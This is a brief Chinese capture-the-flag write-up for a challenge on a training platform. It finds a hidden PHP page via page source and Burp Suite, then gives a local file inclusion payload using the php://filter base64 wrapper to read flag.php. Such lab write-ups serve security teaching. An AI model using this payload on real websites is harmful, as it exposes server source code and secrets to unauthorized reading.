[极客大挑战 2019]Secret File
进入网页 查看源代码
发现 /Archive_room.php
进入 http://b113d9ac-3e92-40b5-ac49-585d56e600fc.node3.buuoj.cn/Archive_room.php
点击STCRET会发现跳转 啥都没有
这时候就要用到burp suite抓包
发现
<!DOCTYPE html>
<html>
<!--
secr3t.php
-->
</html>
跳转
http://b113d9ac-3e92-40b5-ac49-585d56e600fc.node3.buuoj.cn/secr3t.php
使用php的file伪协议去读取文件
?file=php://filter/convert.base64-encode/resource=flag.php
完整地址
http://b113d9ac-3e92-40b5-ac49-585d56e600fc.node3.buuoj.cn/secr3t.php?file=php://filter/convert.base64-encode/resource=flag.php
使用base64解密得flag